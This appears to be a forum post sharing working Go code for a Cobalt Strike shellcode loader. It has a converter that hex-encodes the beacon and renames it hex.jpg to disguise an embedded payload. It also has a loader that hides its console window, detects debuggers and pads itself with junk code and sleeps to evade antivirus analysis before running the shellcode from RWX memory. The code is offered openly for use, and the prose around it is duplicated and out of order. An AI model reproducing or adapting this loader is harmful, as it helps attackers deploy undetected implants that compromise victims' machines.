Generate a bin file in ram format through Cobalt Strike and convert it into hexadecimal shellcode through
123.go code:
Code:
Modify the generated shellcode.txt to hex.jpg to facilitate go loading resource file packaging
Code:
Now you can happily do more obfuscation and loading
I just want to publish these codes
123.go code:
Code:
Code:
package main
import (
"encoding/hex"
"flag"
"fmt"
"io/ioutil"
)
func main() {
// Parse command line arguments
filePath := flag.String("f", "", "Specify the path to the 32-bit EXE file")
flag.Parse()
if *filePath == "" {
fmt.Println("Please specify the path to the 32-bit EXE file with the -f flag")
return
}
// Read the EXE file
data, err := ioutil.ReadFile(*filePath)
if err != nil {
fmt.Printf("Failed to read file: %v\n", err)
return
}
// Convert to hexadecimal string
hexString := hex.EncodeToString(data)
// Write result to shellcode.txt
err = ioutil.WriteFile("shellcode.txt", []byte(hexString), 0644)
if err != nil {
fmt.Printf("Failed to write file: %v\n", err)
return
}
fmt.Println("Conversion successful, output written to shellcode.txt")
}Modify the generated shellcode.txt to hex.jpg to facilitate go loading resource file packaging
Code:
Code:
package main
import (
"encoding/hex"
"math/rand"
"syscall"
"time"
"unsafe"
_ "embed"
"github.com/lxn/win"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
//go:embed hex.jpg
var hexData []byte
var (
k32 = syscall.MustLoadDLL("kernel32.dll")
VAlloc = k32.MustFindProc("VirtualAlloc")
VFree = k32.MustFindProc("VirtualFree")
memcpy = syscall.MustLoadDLL("msvcrt.dll").MustFindProc("memcpy")
isDebuggerPresent = k32.MustFindProc("IsDebuggerPresent")
checkRemoteDebugger = k32.MustFindProc("CheckRemoteDebuggerPresent")
)
func antiDebugCheck() {
ret, _, _ := isDebuggerPresent.Call()
if ret != 0 {
panic("Debugger detected, exiting...")
}
var debuggerPresent int32
_, _, _ = checkRemoteDebugger.Call(0xffffffff, uintptr(unsafe.Pointer(&debuggerPresent)))
if debuggerPresent != 0 {
panic("Remote debugger detected, exiting...")
}
strongObfuscation()
}
func allocateFakeMemory(times int) {
for i := 0; i < times; i++ {
size := uintptr(rand.Intn(4096) + 1024)
addr, _, _ := VAlloc.Call(0, size, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr != 0 {
for j := 0; j < int(size); j += 64 {
*(*byte)(unsafe.Pointer(addr + uintptr(j))) = byte(rand.Intn(256))
}
VFree.Call(addr, 0, 0)
}
strongObfuscation()
}
}
func addRandomDelays(maxDelay time.Duration) {
rand.Seed(time.Now().UnixNano())
totalDelay := time.Duration(0)
for totalDelay < maxDelay {
delay := time.Duration(rand.Intn(1000)) * time.Millisecond
time.Sleep(delay)
totalDelay += delay
randomCalculations()
fakeFunctionChain()
fakeAPICalls()
strongObfuscation()
}
}
func fakeFunctionChain() {
a := rand.Intn(1000)
if a%3 == 0 {
fakeFuncA()
} else if a%3 == 1 {
fakeFuncB()
} else {
fakeFuncC()
}
strongObfuscation()
}
func fakeFuncA() {
for i := 0; i < 5000; i++ {
_ = i * i
strongObfuscation()
}
}
func fakeFuncB() {
for i := 0; i < 3000; i++ {
_ = i + i
strongObfuscation()
}
}
func fakeFuncC() {
for i := 0; i < 7000; i++ {
_ = i - i
strongObfuscation()
}
}
func randomCalculations() {
for i := 0; i < 20000; i++ {
a := rand.Intn(100)
b := rand.Intn(100)
c := (a * b) / (1 + rand.Intn(1))
_ = (c ^ rand.Intn(1000)) << 2
strongObfuscation()
}
}
func fakeAPICalls() {
time.Sleep(time.Duration(rand.Intn(500)) * time.Millisecond)
_ = time.Now().UnixNano()
_ = syscall.Getpid()
strongObfuscation()
}
func executeShellcode(sc []byte) {
addr, _, _ := VAlloc.Call(0, uintptr(len(sc)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr == 0 {
return
}
memcpy.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
addRandomDelays(10 * time.Second)
syscall.Syscall(addr, 0, 0, 0, 0)
VFree.Call(addr, 0, 0)
strongObfuscation()
}
func confuseControlFlow() {
for i := 0; i < rand.Intn(5)+5; i++ {
switch rand.Intn(4) {
case 0:
fakeFunctionChain()
case 1:
addRandomDelays(time.Duration(rand.Intn(2)) * time.Second)
case 2:
randomCalculations()
case 3:
allocateFakeMemory(rand.Intn(5) + 1)
}
strongObfuscation()
}
}
func strongObfuscation() {
for i := 0; i < rand.Intn(1000); i++ {
_ = rand.Intn(1000) ^ rand.Intn(1000)
time.Sleep(time.Duration(rand.Intn(10)) * time.Microsecond)
if rand.Intn(2) == 0 {
allocateFakeMemory(rand.Intn(3))
}
if rand.Intn(5) == 0 {
fakeFunctionChain()
}
}
}
func main() {
win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)
antiDebugCheck()
confuseControlFlow()
sc, _ := hex.DecodeString(string(hexData))
allocateFakeMemory(10)
addRandomDelays(5 * time.Second)
executeShellcode(sc)
confuseControlFlow()
strongObfuscation()
}Now you can happily do more obfuscation and loading
I just want to publish these codes
